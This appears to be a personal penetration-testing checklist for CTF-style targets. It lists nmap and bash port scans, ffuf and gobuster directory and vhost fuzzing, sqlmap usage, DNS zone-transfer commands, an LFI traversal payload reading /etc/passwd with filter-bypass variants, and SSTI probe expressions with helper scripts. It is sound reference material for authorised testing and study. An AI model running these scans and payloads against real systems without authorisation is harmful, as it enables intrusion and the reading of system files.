Enumeration Checklist

Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Setup #

export IP=10.10.10.10 # bare address, no scheme: nmap takes $IP as-is and the web commands below prepend http:// themselves

nmap #

sudo nmap -p- $IP --open # Just show open ports
sudo nmap -p- -Pn -sS -n -sC -A -T4 -v $IP # david exploit scan
sudo nmap -v -sV -sC -O -T4 -n -Pn -oA fastscan $IP # 1000 port fastscan
sudo nmap -v -sV -sC -O -T4 -n -Pn -p- --min-rate 5000 -oA fullfastscan $IP # all port fastscan (-oA takes the output basename as its argument, so it must sit directly before fullfastscan)

Also try -sU for UDP.

  • Extras

    • Threader3000
    • Port scan (basic): nmap -sV IP
    • Port scan (advanced): nmap -sS -sV -sC -O -T4 -Pn -n IP
    • Network sweep: nmap -sn 192.168.0.1-254
    • Enumerate Samba: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse IP
    • Enumerate network fs: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount IP
    • Scan for vulns: nmap -sV -vv --script vuln IP
  • Opts

    • -p- all ports
    • -Pn assume online
    • -sS TCP SYN
    • -n don’t do host resolution
    • -sC default NSE script scan (same as --script=default)
    • -A aggressive: OS detection (-O), version detection (-sV), default scripts (-sC) and traceroute
    • -T4 timing template 4
    • -v verbosity
  • No nmap

    # bash only (/dev/tcp is a bash feature); scans TCP 1-1000 on $IP from Setup
    for PORT in {1..1000}; do timeout 1 bash -c "</dev/tcp/$IP/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done
    
  • Can also try RustScan.
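The scans above are usually chained: a fast sweep of all 65535 ports, then the slow -sV/-sC/-O pass only on the ports that came back open. The script below is an added example (not from the original notes) that parses nmap's grepable (-oG) output into a -p list and runs the two stages; it assumes nmap is installed and that $IP holds a bare address as in the Setup section. The sample -oG file it writes is constructed, not a real scan result.

```bash
#!/usr/bin/env bash
# Two-stage scan: fast all-ports sweep, then service/script/OS detection on the
# open ports only. Added example, not from the original notes.

# Print the open TCP ports from an nmap grepable (-oG) file as a comma-separated
# list for -p. A grepable line has tab-separated fields:
#   Host: 10.10.10.10 ()<TAB>Ports: 22/open/tcp//ssh///, 80/open/tcp//http///<TAB>Ignored State: ...
# Entries whose state is not exactly "open" (closed, filtered, open|filtered) and
# non-TCP entries are skipped.
open_ports_from_gnmap() {
  awk -F'\t' '/Ports:/ {
      for (i = 1; i <= NF; i++) if (sub(/^Ports: /, "", $i)) {
        n = split($i, e, /, */)
        for (j = 1; j <= n; j++) {
          split(e[j], f, "/")
          if (f[2] == "open" && f[3] == "tcp") print f[1]
        }
      }
    }' "$1" | sort -n -u | paste -s -d ',' -
}

# Constructed sample of -oG output (not a real scan), for trying the parser offline.
write_sample_gnmap() {
  {
    printf '%s\n' '# Nmap 7.94 scan initiated as: nmap -p- --min-rate 5000 -oG stage1.gnmap 10.10.10.10'
    printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.10 ()\tPorts: 8080/open/tcp//http-proxy///, 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///, 161/open|filtered/udp//snmp///\tIgnored State: filtered (65531)\n'
    printf '%s\n' '# Nmap done -- 1 IP address (1 host up) scanned'
  } > "$1"
}

# Stage 1: every port, fast, no scripts. Stage 2: -sV -sC -O on just the open
# ports, saved in all formats (-oA <basename>).
two_stage_scan() {
  local target="$1" base="${2:-stage1}" ports
  sudo nmap -p- --min-rate 5000 -T4 -n -Pn -oG "$base.gnmap" "$target" >/dev/null
  ports=$(open_ports_from_gnmap "$base.gnmap")
  if [ -z "$ports" ]; then
    echo "no open TCP ports found (try -sU, or drop -Pn if the host may be down)" >&2
    return 1
  fi
  echo "open TCP ports: $ports"
  sudo nmap -sV -sC -O -T4 -n -Pn -p "$ports" -oA "${base}_targeted" "$target"
}

# Usage: ./two_stage.sh "$IP"   (with no argument nothing is scanned)
if [ $# -gt 0 ]; then two_stage_scan "$1"; fi
```

The parser deliberately drops open|filtered and closed entries; if stage 1 reports everything as filtered, the target is probably dropping SYNs and the sweep needs to be re-run slower or with -sU.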

Fuzzing #

Directories #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:FUZZ -u http://$IP/FUZZ -t 200 -fc 404
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:FUZZ -u http://$IP/FUZZ/ -t 200 -fc 404

Extensions #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-extensions.txt:FUZZ -u http://$IP/blog/indexFUZZ -t 200 -fc 404

Files #

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt:FUZZ -u http://$IP/blog/FUZZ.php -t 200 -fc 404

Subdomains (vhost) #

gobuster vhost -u https://example.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k --append-domain
ffuf -c -w ~/Sync/Sec/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://trick.htb -H "Host: preprod-FUZZ.trick.htb" -t 200 -fs 5480

gobuster 3.2+ needs --append-domain, otherwise the Host header is just the bare word. The -fs 5480 is the response size of the default vhost on that particular box: find the value for your target by requesting the site once with a bogus Host header, or let ffuf work it out with -ac.

Web - SQL Injection? #

Copy the request (browser dev tools "Copy as cURL", or Burp's "Copy to file" for the raw request) and hand it to sqlmap: `sqlmap -r request.txt --batch` for a raw request file, or rebuild it from the curl flags as `sqlmap -u "<url>" --cookie "..." --data "..."`.

Other services #

  • Enum DNS

    • Commands to try (placeholders in braces):

          dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name}    # reverse lookup of the loopback range via the target's nameserver
          dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name}
          dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name}  # reverse lookup of the target's own range
          dig axfr {Domain_Name} @{IP}                          # zone transfer attempt; the zone name is required (without it dig asks for "."), success dumps every record
          nslookup
              server {IP}
              127.0.0.1
              {IP}
              {Domain_Name}
              exit
  • Enum SMTP

LFI #

/index.php?page=..././..././..././..././..././etc/passwd

Try plain ../ first; ..././ (and ....//) are for a filter that strips ../ only once, because the strip leaves a fresh ../ behind. URL-encoded (%2e%2e%2f) and double-encoded variants cover filters that run before decoding.
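The reason the doubled form works is easiest to see by running the filter. The script below is an added example, not from the original notes: the two filters are hypothetical sanitisers written with sed, standing in for something like PHP's str_replace('../', '', $page), and it generalises the checklist payload to the ....// variant as well.

```bash
#!/usr/bin/env bash
# Why "..././" gets through a filter that deletes "../" once: the pieces left
# behind reassemble into a new "../". Added example, not from the original notes.

# Naive filter: remove every occurrence of "../" in one pass (hypothetical,
# stands in for str_replace('../', '', $page)).
strip_once() { printf '%s\n' "$1" | sed 's#\.\./##g'; }

# Hardened variant: repeat until the string stops changing, so the "../" that
# the first pass leaves behind is removed too. Rejecting the request outright,
# or resolving the path and checking it stays under the web root, is better still.
strip_recursive() {
  local cur="$1" prev=""
  while [ "$cur" != "$prev" ]; do
    prev="$cur"
    cur=$(strip_once "$cur")
  done
  printf '%s\n' "$cur"
}

# Show what each filter does to the checklist payload and the "....//" variant.
demo() {
  local p
  for p in '..././..././..././etc/passwd' '....//....//....//etc/passwd'; do
    printf 'payload:   %s\n' "$p"
    printf 'one pass:  %s\n' "$(strip_once "$p")"
    printf 'recursive: %s\n' "$(strip_recursive "$p")"
  done
}
demo
```

Both doubled payloads come out of the one-pass filter as ../../../etc/passwd, which is exactly the traversal the filter was meant to block; the recursive filter reduces them to etc/passwd.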

SSTI #

General tests #

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
*{7*7}
#{7*7}
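Two things bite when firing these by hand: "#{7*7}" is a URL fragment unless encoded and never leaves the client, and a page that echoes the payload back as text looks different from one that evaluated it. The script below is an added example, not from the original notes; it assumes curl is installed and that the URL and parameter name are placeholders you replace.

```bash
#!/usr/bin/env bash
# Send each SSTI test expression to one GET parameter and report which ones the
# server evaluated. Added example, not from the original notes.

# Percent-encode every byte except unreserved characters. Needed because "#"
# starts a URL fragment, "%" is the escape character, and "<", "{", "}" and
# space are not valid in a query string.
urlencode() {
  local s="$1" c out=""
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}      # first character of $s
    s=${s#?}             # the rest
    case "$c" in
      [a-zA-Z0-9.~_-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s\n' "$out"
}

# True when the response contains the computed value (49) and does not echo the
# payload back verbatim. A page that already contains "49" somewhere gives a
# false positive, so confirm with a second expression (e.g. 7*9) before trusting it.
ssti_evaluated() {
  local body="$1" payload="$2"
  case "$body" in
    *"$payload"*) return 1 ;;   # reflected as text: not evaluated
    *49*)         return 0 ;;
    *)            return 1 ;;
  esac
}

# Fetch each probe and print a verdict per payload (the list is the one above).
ssti_probe() {
  local url="$1" param="$2" p body
  for p in '{{7*7}}' '${7*7}' '<%= 7*7 %>' '${{7*7}}' '*{7*7}' '#{7*7}'; do
    body=$(curl -s "${url}?${param}=$(urlencode "$p")")
    if ssti_evaluated "$body" "$p"; then
      printf 'EVALUATED  %s\n' "$p"
    else
      printf 'no         %s\n' "$p"
    fi
  done
}

# Usage: ./ssti_probe.sh 'http://10.10.10.10/page' name   (placeholders)
if [ $# -eq 2 ]; then ssti_probe "$1" "$2"; fi
```

Which expression renders narrows the engine down (the PayloadsAllTheThings page linked below has the table); a verbatim echo of the payload means the parameter is not going through a template at all.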

Other payloads #

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md